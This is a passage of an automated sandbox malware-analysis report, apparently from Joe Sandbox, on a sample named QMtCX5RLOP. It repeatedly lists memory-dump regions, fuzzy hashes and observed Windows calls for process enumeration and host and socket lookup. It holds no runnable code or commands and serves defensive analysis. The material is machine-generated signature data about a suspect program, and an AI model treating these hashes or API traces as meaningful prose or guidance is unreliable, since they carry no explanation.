                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36f273d4e77ab69f6f46b9f9f8d3abce2d94db10ba2a3746c29e135639d2ed7c
                                                            • Instruction ID: 12163f2b2aea61de4da29f5a2c29d50af22610b92a437a2c85d29153c7058870
                                                            • Opcode Fuzzy Hash: 36f273d4e77ab69f6f46b9f9f8d3abce2d94db10ba2a3746c29e135639d2ed7c
                                                            • Instruction Fuzzy Hash: 4E71B6E714C321BDBBD2C0456B54AFB276EEFD67307B0A42EF807C6542E2944A4A54B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 40417470e841aa76e0f84f8255565cc8028fb1ffc922ed7fa01011abd1ba0a7f
                                                            • Instruction ID: 279fc1262ea2c20476f51b456092e8008d1d6f476abed8adde1cf15a973913df
                                                            • Opcode Fuzzy Hash: 40417470e841aa76e0f84f8255565cc8028fb1ffc922ed7fa01011abd1ba0a7f
                                                            • Instruction Fuzzy Hash: 1F71C6E710C321BDBBD2C0456B54AFA276EEFD6730770A42FF807C6642E3940A8A51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 0771b1e7327b3d6ab6f1d85d3d0135c8fb079f5e0b8d81230fe4b68557d7798c
                                                            • Instruction ID: eff3f92d4e5d0ec3107f8906e6c442ef38ffae2fa2066e99a6c41bdaa29dc198
                                                            • Opcode Fuzzy Hash: 0771b1e7327b3d6ab6f1d85d3d0135c8fb079f5e0b8d81230fe4b68557d7798c
                                                            • Instruction Fuzzy Hash: 2461A3E714C321BDBBD2C0456B54AFB676EEBD6730770952FF807C6542E2940A4A50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 66a7458792d2c47eb0eecbe026e249075a0cde2469ad6ef42ed6a9bfab6fff3a
                                                            • Instruction ID: 460cc380b037f5e16e0b2aade1d30a364ec4439436a923950865a985a3d9fb75
                                                            • Opcode Fuzzy Hash: 66a7458792d2c47eb0eecbe026e249075a0cde2469ad6ef42ed6a9bfab6fff3a
                                                            • Instruction Fuzzy Hash: 6961C3E710C321BDBBD2C0556B649FB576EEBD67307B0A42FF807C6942E3940A8A54B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 0c79e8006e0afd744f387c0886a1f9807b857edf8f7a684c3ff590d52db40864
                                                            • Instruction ID: 79bc3f85b69247604d788cb00d5a9a51cf46adb90af8db48e23b7cbaffa41e07
                                                            • Opcode Fuzzy Hash: 0c79e8006e0afd744f387c0886a1f9807b857edf8f7a684c3ff590d52db40864
                                                            • Instruction Fuzzy Hash: 5F61B3E714C321BDBBD2C0556B54AFB576EEBD67307B0A42FF807C6942E3940A8A50B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 0437dbc4099c7a2695d6240cf4913c6dd9184d151e9ccd7f3c15d8e45623c34e
                                                            • Instruction ID: ba51b80b4e8425f119aedad9b7dd2a10eaa3c2089aa7003118960fb9440371b2
                                                            • Opcode Fuzzy Hash: 0437dbc4099c7a2695d6240cf4913c6dd9184d151e9ccd7f3c15d8e45623c34e
                                                            • Instruction Fuzzy Hash: 5361C3E710C321BDBB92C0556B54EFB276EEFD67303B0A52FF807C6542E2940A8A50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2bd4689572770e61ab4a7501d4d0e3d97c8667d66a1e612cb5e1881e0eb39f6b
                                                            • Instruction ID: 4f93544c6ccef86a1de69155745beaa04bbd37a728c3c55fb2b26c3ec8633c8c
                                                            • Opcode Fuzzy Hash: 2bd4689572770e61ab4a7501d4d0e3d97c8667d66a1e612cb5e1881e0eb39f6b
                                                            • Instruction Fuzzy Hash: 2161C3E710C321BDBBC2C0556B54EFB176EEBD67307B0952FF80BC6942E2940A8A54B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a11f77ef5eddb02915744dbf60bc4024a31db3887207f9c777df90e27075998a
                                                            • Instruction ID: f30dea76e99ce61e27f4fde93c934a64fd2b0c604157aef796cb4f6e441cfb91
                                                            • Opcode Fuzzy Hash: a11f77ef5eddb02915744dbf60bc4024a31db3887207f9c777df90e27075998a
                                                            • Instruction Fuzzy Hash: E161E5E710C321BDBB82C1556B64AFB576EEBD6730770A52FF807C6542E3980A8A50B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 935c7aeaf453a8490ed04d0ca0f2961d49724cb4fd793e280fc3b5b8bc58d1ae
                                                            • Instruction ID: 7fbb16ee9d22e1cd4b4baf1f464975adbe56273d766dfea4f67e92569f35262d
                                                            • Opcode Fuzzy Hash: 935c7aeaf453a8490ed04d0ca0f2961d49724cb4fd793e280fc3b5b8bc58d1ae
                                                            • Instruction Fuzzy Hash: 8151B2E710C321BDBBC2C1556B54EFB176EEBD67303B0952FF807C6942E2940A4A54B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 06159e9043e8437c952e30fe74e2c802f7bfedc143ba6690ea5f0c7ae16fb5d7
                                                            • Instruction ID: a3a97c96e20655fdcf679e0bdb8213b37a413ceb7e584adb504decb56031684c
                                                            • Opcode Fuzzy Hash: 06159e9043e8437c952e30fe74e2c802f7bfedc143ba6690ea5f0c7ae16fb5d7
                                                            • Instruction Fuzzy Hash: 2351B1E714C321BDBB92C0556B64DFB176DEBD67303B0A52FF807C6942E3980A8A54B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: a78e0e53a0668b2c7150ff63901db7047d57c83ecde2ea3e4365776b762d6297
                                                            • Instruction ID: c94d6d180498f5b726c5023528c3d2110dc9e60319b87453060cd6c3d3ecec55
                                                            • Opcode Fuzzy Hash: a78e0e53a0668b2c7150ff63901db7047d57c83ecde2ea3e4365776b762d6297
                                                            • Instruction Fuzzy Hash: 4351B1E710C321BDBB82C4556B64DFA276EEBD67303B0A52FF807C5542E3940A8A55B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: bfd6b1c96ab78351aa33413c3b9ea9f869c2f7a5ba750a692fffa2b18c84bdc9
                                                            • Instruction ID: 6b839f8b949794bf60c34250c047a9b02bf1942ab02f62fc9cf602092070d083
                                                            • Opcode Fuzzy Hash: bfd6b1c96ab78351aa33413c3b9ea9f869c2f7a5ba750a692fffa2b18c84bdc9
                                                            • Instruction Fuzzy Hash: D351C1E710C321BDBB82C4556B64DFB276EEBD67303B0A52FF807C5942E3940A8A55B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 6eb7f1369dfa6ba9b0f18b71ea6c66504be91324cac10f021ee66a28ea7859d5
                                                            • Instruction ID: ccc1d78b94d91765c17f7d66b50ce5fe29d9c17f71df1f83a87fa9865b086d80
                                                            • Opcode Fuzzy Hash: 6eb7f1369dfa6ba9b0f18b71ea6c66504be91324cac10f021ee66a28ea7859d5
                                                            • Instruction Fuzzy Hash: E451E3E710C321BDBBD2C0556B54DFA176EEFE67303B0A52FF80BC5942E2940A8A51B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: dd9595cf69d5fa9d10aa1fe32b413e0afd02673ec5f9d862d99bb7c3b4d27d88
                                                            • Instruction ID: dfeaace36591ba28337a69df609bd99a6d328734aad295f90d5f4c31f154cf39
                                                            • Opcode Fuzzy Hash: dd9595cf69d5fa9d10aa1fe32b413e0afd02673ec5f9d862d99bb7c3b4d27d88
                                                            • Instruction Fuzzy Hash: 1A5104E710C321BDBB92C0552E54DFA276EEED6730370952FF807C5942E2940A8A55B1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 655d87be78fb6e905db2fdd4f9f9ce0a87988973ff67408b2ef1f782d95f133f
                                                            • Instruction ID: e9a682280e05ca542dcf7fb333cb368ea6026f6bf825ca62de163125db4e4c98
                                                            • Opcode Fuzzy Hash: 655d87be78fb6e905db2fdd4f9f9ce0a87988973ff67408b2ef1f782d95f133f
                                                            • Instruction Fuzzy Hash: 7251C0E710C321BCBBD2C0556B54DFA276EEAE67303B0A92FF807C5542E2940A8A55B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: f596b503980e28e5696aeb57c7204566229081064d8ef19db15e91f501b76261
                                                            • Instruction ID: dbca5eddecedd7031b9ddc7ba09aaf2f1b2dc86de9c814b328768902261a428a
                                                            • Opcode Fuzzy Hash: f596b503980e28e5696aeb57c7204566229081064d8ef19db15e91f501b76261
                                                            • Instruction Fuzzy Hash: 6E41B3E710D321BDBBD2C0556B54DFA176EEFE67303B0A52FF807C5942E2940A8A54B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 48685d249ea2e90946529869fa62a88026a505df921501147a145de987dcee73
                                                            • Instruction ID: 390ef894141b3a673ca12245f2ae043857cc02446dcfd86e491202ac328ff1d6
                                                            • Opcode Fuzzy Hash: 48685d249ea2e90946529869fa62a88026a505df921501147a145de987dcee73
                                                            • Instruction Fuzzy Hash: E741A3E710C321BDBBD2C4556A54DFB176DEFE67303B0A52FF807C5542E2940A8A54B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: d22b08815f8ec90090682e2818c16a61fe62e880c60f492dd23f45d7aca1f3da
                                                            • Instruction ID: 1fb12cd0c53514ef001bf13c9cbbcc8e02766f7e9f57f0be0541ca531e050d4a
                                                            • Opcode Fuzzy Hash: d22b08815f8ec90090682e2818c16a61fe62e880c60f492dd23f45d7aca1f3da
                                                            • Instruction Fuzzy Hash: E941B4E710C321BDBBD280556F54DFB176DEBE6730370A52FF817C5542E2940A8A54B1
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: 181ddc13e0918c722587ac4bf74773a389fa9be05fcb75f2bd6104de5016d3de
                                                            • Instruction ID: 7623e62c50666b8d23cf72c36106bfca5fc7c356a8b9a1490596b0a0de39d716
                                                            • Opcode Fuzzy Hash: 181ddc13e0918c722587ac4bf74773a389fa9be05fcb75f2bd6104de5016d3de
                                                            • Instruction Fuzzy Hash: D541F2E710C321BDBB82C5456E50DFA2B6EEFD6330370952FF807C6942E2940A8A55B2
                                                            APIs
                                                            • Process32FirstW.KERNEL32(00000005,00000005,00000005,?), ref: 06E903BE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: FirstProcess32
                                                            • String ID:
                                                            • API String ID: 2623510744-0
                                                            • Opcode ID: ba210c5dd0502d531e0852608f22b96b0aad8533fdf6976b743b3c44155f781f
                                                            • Instruction ID: c20c2096629c9093ab6a2765237d3be582372cb53ee76c8870a4d7f93b4e9d2b
                                                            • Opcode Fuzzy Hash: ba210c5dd0502d531e0852608f22b96b0aad8533fdf6976b743b3c44155f781f
                                                            • Instruction Fuzzy Hash: 6141A2E710C321BCBBD284456B549FA176EEEE6730370A52FF807C5942E2940E8A54B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 6ca47bf90b2af5fe5b168a87292b08e517b540ad66968e2c4fa3ed4480c3606c
                                                            • Instruction ID: 59b40d3fb40571066bb2f7a09854d01c88f2f96ca231022b47be80f3e25da81e
                                                            • Opcode Fuzzy Hash: 6ca47bf90b2af5fe5b168a87292b08e517b540ad66968e2c4fa3ed4480c3606c
                                                            • Instruction Fuzzy Hash: 8A3181F714C321BDB3D285456F68AFB576EE6D6738730A426F443CE542E3886A4E10B1
                                                            APIs
                                                            • gethostname.WS2_32(00000000,00000040), ref: 00DF4AA5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: gethostname
                                                            • String ID:
                                                            • API String ID: 144339138-0
                                                            • Opcode ID: 5408350fce44240d4f17c542397a3c10c6ef11931c6767e1046a8f06421a2f95
                                                            • Instruction ID: fe8a6b1ba0e770e8ab53d055a5bcdf0137a374299f29286262773c2061fa85d7
                                                            • Opcode Fuzzy Hash: 5408350fce44240d4f17c542397a3c10c6ef11931c6767e1046a8f06421a2f95
                                                            • Instruction Fuzzy Hash: 8151D4706043089BE7319F25D94973376D4EF40318F0A893DDB8A866D2E7B4E884CB32
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 25ae8642f3353dbc20a1b48b570dfa38fd4e61cbcd00dd3175aca96962c3679b
                                                            • Instruction ID: dbd23c8056b488f7eb914ea933d14688c7c22428db12054e1c25a40aa6fc1365
                                                            • Opcode Fuzzy Hash: 25ae8642f3353dbc20a1b48b570dfa38fd4e61cbcd00dd3175aca96962c3679b
                                                            • Instruction Fuzzy Hash: B4314DF714C361BDB3D280452F24AFA1B2EE5E6738731E52AF443CE542E2892A4E11B1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 4490918f1dec93a7ed0c9b9b4754d110de1f07852f885cde8b4b5e72fc0bd777
                                                            • Instruction ID: 69a81f5e52e8fe80c4bfccfd364355a009de0d1e8e931bf8fccdebd847524534
                                                            • Opcode Fuzzy Hash: 4490918f1dec93a7ed0c9b9b4754d110de1f07852f885cde8b4b5e72fc0bd777
                                                            • Instruction Fuzzy Hash: D831A0F718C321BD73D285556F24AFB1B1EE5D6738331A52AF443CE542E2896A4E10F1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: de51fe397bd4cba0976493ae1ad7c44beced2feb296ed5f42b9ec4c8f8759c7b
                                                            • Instruction ID: 06f94d5cdb5599eef33cbd2c4d68a621bfe231e14bbca97282309a7e34e01b26
                                                            • Opcode Fuzzy Hash: de51fe397bd4cba0976493ae1ad7c44beced2feb296ed5f42b9ec4c8f8759c7b
                                                            • Instruction Fuzzy Hash: 71212DF714C321BD73D284452F24AFB071EE5E6738731E52AF847CE942E2896A8E10B1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: f13960ce050fd1b52e191c35434204b5022a7f23d89f6e765b1d7241a1b6d57e
                                                            • Instruction ID: 568f23d118bfd9207fa4de5405d9e57c5d04eb5d60753e373eddec68a0bdd0c3
                                                            • Opcode Fuzzy Hash: f13960ce050fd1b52e191c35434204b5022a7f23d89f6e765b1d7241a1b6d57e
                                                            • Instruction Fuzzy Hash: D22130F714C321BD73D284452F24AFB471EE5E6738731E42AF807CE542E2896B4A10B1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 2debf5f07f14b6ec5b441f7924cdcf79d2c026879848aad298ad57874a83346d
                                                            • Instruction ID: f43c8c304d34a0b46478a80d5b2042086a1d26d54a10e19d9d6e908f117600d0
                                                            • Opcode Fuzzy Hash: 2debf5f07f14b6ec5b441f7924cdcf79d2c026879848aad298ad57874a83346d
                                                            • Instruction Fuzzy Hash: 52212CF714C321BD73D684556F24AFB171EE5E6738731E42AF447CE942E2887A8A10B1
                                                            APIs
                                                            • Process32NextW.KERNEL32(?,?,06EA02A7,?), ref: 06EA045D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831128635.0000000006EA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6ea0000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: NextProcess32
                                                            • String ID:
                                                            • API String ID: 1850201408-0
                                                            • Opcode ID: 84414becb9730a511a2a44f21295f8fa073267b1cff4cb1b97e0eb56fa608027
                                                            • Instruction ID: c8373c9a7ab8730b8b38a3a909fca268b3b0b10c4c9f5800ad7d8f0994a710f4
                                                            • Opcode Fuzzy Hash: 84414becb9730a511a2a44f21295f8fa073267b1cff4cb1b97e0eb56fa608027
                                                            • Instruction Fuzzy Hash: DE21B2F714C311BDB3D284552F24AFB172EE6E6738731E52AF443CE542E2846A4A10B0
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00E0AFD1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID:
                                                            • API String ID: 3358416759-0
                                                            • Opcode ID: 92320ebed1d64c3d946c9d2bf204d386c62bf24f47c11055b25e8f87e44a45ae
                                                            • Instruction ID: 74ca10e7c1e013e9a30e4280b63ca266c3651fdc4c4f35a747bbf24a30f06f04
                                                            • Opcode Fuzzy Hash: 92320ebed1d64c3d946c9d2bf204d386c62bf24f47c11055b25e8f87e44a45ae
